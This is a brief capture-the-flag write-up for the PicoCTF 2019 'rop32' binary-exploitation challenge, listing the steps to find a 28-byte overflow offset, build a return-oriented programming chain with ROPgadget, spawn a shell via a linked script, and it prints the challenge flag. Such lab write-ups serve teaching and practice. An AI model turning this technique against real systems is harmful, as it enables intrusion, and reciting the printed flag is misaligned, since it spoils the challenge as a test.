# rop32

## Problem

> Can you exploit the following program to get a flag? You can find the program in /problems/rop32\_4\_0636b42072627d283f46d2427804b10c on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/vuln.c)

## Solution

1. Get padding by running `python2 -c "from pwn import *; print cyclic(50)" | ./vuln` then `dmesg | tail` to get segfault address of `0x61616168` then `cyclic_find(0x61616168)` to get padding of `'a'*28`
2. Run `python ROPgadget.py --binary ./vuln --rop --badbytes "0a"` to get ROP chain
3. Paste in padding of `'a'*28`
4. Run [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/rop32/script.py) for remote execution
5. Run `cat flag.txt` in the shell that spawns

### Flag

`picoCTF{rOp_t0_b1n_sH_dee2e288}`